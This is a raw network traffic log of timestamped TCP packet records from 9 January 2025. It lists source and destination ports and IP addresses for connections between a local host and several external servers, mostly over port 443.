                                        Jan 9, 2025 00:45:51.578022957 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.578877926 CET49728443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.578885078 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.581969023 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.582007885 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.582041025 CET49728443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.582050085 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.582096100 CET49728443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.601028919 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.601082087 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.601135015 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.601596117 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.601609945 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.624387980 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.624399900 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.662425041 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.662463903 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.662507057 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.662523031 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.662590027 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.662595987 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.662868023 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.662909031 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.662916899 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.663038969 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.663069010 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.663086891 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.663094044 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.663136959 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.663302898 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.663687944 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.663722992 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.663746119 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.663757086 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.663789988 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.663831949 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.663841963 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.663882017 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.664129972 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.664263010 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.664302111 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.664309025 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.664554119 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.664582014 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.664598942 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.664607048 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.664654970 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.665113926 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.665174961 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.665210009 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.665215969 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.665261030 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.665375948 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.665452957 CET49727443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.665467024 CET44349727104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.665734053 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.665914059 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.666029930 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.666081905 CET49728443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.666089058 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.666131973 CET49728443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.666135073 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.666148901 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.666193962 CET49728443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.666414976 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.666621923 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.666671038 CET49728443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.666677952 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.666707039 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.666748047 CET49728443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.666773081 CET49728443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.666776896 CET44349728104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.672146082 CET49730443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.672171116 CET44349730104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.672571898 CET49730443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.673544884 CET49730443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:51.673563957 CET44349730104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:51.865295887 CET8049714120.138.96.3192.168.2.16
                                        Jan 9, 2025 00:45:51.865487099 CET4971480192.168.2.16120.138.96.3
                                        Jan 9, 2025 00:45:51.952122927 CET4971480192.168.2.16120.138.96.3
                                        Jan 9, 2025 00:45:52.153717041 CET8049714120.138.96.3192.168.2.16
                                        Jan 9, 2025 00:45:52.155451059 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.155776978 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.155806065 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.156181097 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.156527996 CET44349730104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.156554937 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.156625986 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.156748056 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.156903982 CET49730443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.156930923 CET44349730104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.157496929 CET44349730104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.157774925 CET49730443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.157855034 CET49730443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.157859087 CET44349730104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.157973051 CET44349730104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.203336000 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.206393003 CET49730443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.300183058 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.300247908 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.300276995 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.300304890 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.300335884 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.300337076 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.300364017 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.300401926 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.300412893 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.300520897 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.300755024 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.300940990 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.300949097 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.304464102 CET44349730104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.304553986 CET44349730104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.304625034 CET49730443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.304960012 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.304991961 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.305030107 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.305039883 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.307548046 CET49730443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.307569981 CET44349730104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.307580948 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.307588100 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.325820923 CET49731443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.325876951 CET44349731104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.325977087 CET49731443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.327560902 CET49731443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.327574015 CET44349731104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.350630045 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.364705086 CET4968080192.168.2.16192.229.211.108
                                        Jan 9, 2025 00:45:52.386924028 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.386985064 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.387058020 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.387087107 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.387351036 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.387396097 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.387403011 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.387619972 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.387665987 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.387710094 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.387717962 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.387907028 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.389043093 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389096022 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389122963 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389149904 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389152050 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.389166117 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389204025 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.389210939 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389239073 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389256954 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.389262915 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389291048 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389341116 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389355898 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389363050 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.389369965 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389379978 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.389395952 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389405966 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.389413118 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.389456034 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.389854908 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.411397934 CET49678443192.168.2.1620.189.173.10
                                        Jan 9, 2025 00:45:52.443398952 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.443408012 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.474221945 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.474258900 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.474291086 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.474293947 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.474308014 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.474355936 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.474616051 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.474632978 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.474669933 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.474679947 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.475008965 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.475059986 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.475069046 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.475081921 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.475125074 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.475734949 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.475806952 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.475811005 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.475821972 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.475858927 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.476490021 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.476552963 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.476778030 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.476844072 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.476912022 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.476969957 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.477318048 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.477382898 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.477755070 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.477792025 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.477824926 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.477826118 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.477834940 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.477863073 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.477876902 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.478786945 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.478872061 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.479082108 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.479149103 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.560683012 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.560780048 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.560868979 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.560920954 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.561182022 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.561249971 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.561264038 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.561295986 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.561305046 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.561336040 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.561405897 CET49729443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.561419964 CET44349729104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.563922882 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.563972950 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.564048052 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.564259052 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.564284086 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.580071926 CET49723443192.168.2.16104.21.32.1
                                        Jan 9, 2025 00:45:52.627335072 CET44349723104.21.32.1192.168.2.16
                                        Jan 9, 2025 00:45:52.666548967 CET4968080192.168.2.16192.229.211.108
                                        Jan 9, 2025 00:45:52.706667900 CET49733443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.706722021 CET44349733104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.706821918 CET49733443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.707066059 CET49733443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.707076073 CET44349733104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.732230902 CET44349723104.21.32.1192.168.2.16
                                        Jan 9, 2025 00:45:52.732281923 CET44349723104.21.32.1192.168.2.16
                                        Jan 9, 2025 00:45:52.732321024 CET44349723104.21.32.1192.168.2.16
                                        Jan 9, 2025 00:45:52.732357025 CET44349723104.21.32.1192.168.2.16
                                        Jan 9, 2025 00:45:52.732366085 CET49723443192.168.2.16104.21.32.1
                                        Jan 9, 2025 00:45:52.732393026 CET44349723104.21.32.1192.168.2.16
                                        Jan 9, 2025 00:45:52.732422113 CET49723443192.168.2.16104.21.32.1
                                        Jan 9, 2025 00:45:52.732496977 CET44349723104.21.32.1192.168.2.16
                                        Jan 9, 2025 00:45:52.732538939 CET49723443192.168.2.16104.21.32.1
                                        Jan 9, 2025 00:45:52.733620882 CET49723443192.168.2.16104.21.32.1
                                        Jan 9, 2025 00:45:52.733638048 CET44349723104.21.32.1192.168.2.16
                                        Jan 9, 2025 00:45:52.747498989 CET49734443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:52.747548103 CET44349734104.21.64.1192.168.2.16
                                        Jan 9, 2025 00:45:52.747656107 CET49734443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:52.747941017 CET49734443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:52.747958899 CET44349734104.21.64.1192.168.2.16
                                        Jan 9, 2025 00:45:52.780917883 CET44349731104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.781220913 CET49731443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.781245947 CET44349731104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.781755924 CET44349731104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.782299995 CET49731443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.782371044 CET44349731104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.782450914 CET49731443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.823333025 CET44349731104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.912652969 CET44349731104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.912731886 CET44349731104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:52.912908077 CET49731443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.913480043 CET49731443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:52.913500071 CET44349731104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.022608995 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.023036003 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.023063898 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.023399115 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.023835897 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.023890972 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.024049997 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.067328930 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.169351101 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.169394016 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.169421911 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.169450998 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.169459105 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.169477940 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.169524908 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.169800997 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.169853926 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.169893026 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.170571089 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.170618057 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.170627117 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.170715094 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.170965910 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.170974016 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.174066067 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.174144983 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.174151897 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.190973043 CET44349733104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.191248894 CET49733443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.191276073 CET44349733104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.191636086 CET44349733104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.191948891 CET49733443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.192023039 CET44349733104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.192106009 CET49733443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.192151070 CET49733443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.192198992 CET44349733104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.200514078 CET44349734104.21.64.1192.168.2.16
                                        Jan 9, 2025 00:45:53.200792074 CET49734443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:53.200814009 CET44349734104.21.64.1192.168.2.16
                                        Jan 9, 2025 00:45:53.201909065 CET44349734104.21.64.1192.168.2.16
                                        Jan 9, 2025 00:45:53.201984882 CET49734443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:53.202370882 CET49734443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:53.202383995 CET49734443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:53.202440977 CET49734443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:53.202456951 CET44349734104.21.64.1192.168.2.16
                                        Jan 9, 2025 00:45:53.202510118 CET49734443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:53.202796936 CET49735443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:53.202838898 CET44349735104.21.64.1192.168.2.16
                                        Jan 9, 2025 00:45:53.202955961 CET49735443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:53.203116894 CET49735443192.168.2.16104.21.64.1
                                        Jan 9, 2025 00:45:53.203130007 CET44349735104.21.64.1192.168.2.16
                                        Jan 9, 2025 00:45:53.221411943 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.256083965 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.256172895 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.256310940 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.256340027 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.256725073 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.256752968 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.256808043 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.256815910 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.256845951 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.256872892 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.256880045 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.256917953 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.257277966 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.257401943 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.257678986 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.257699966 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.257707119 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.257719040 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.257772923 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.258363008 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.258402109 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.258414984 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.258421898 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.258466959 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.258621931 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.259335041 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.259358883 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.259390116 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.259396076 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.259407043 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.259443998 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.259454966 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.259639025 CET49732443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:53.268398046 CET4968080192.168.2.16192.229.211.108
                                        Jan 9, 2025 00:45:53.296402931 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.342823029 CET44349732104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:53.342854977 CET44349732104.18.94.41192.168.2.16
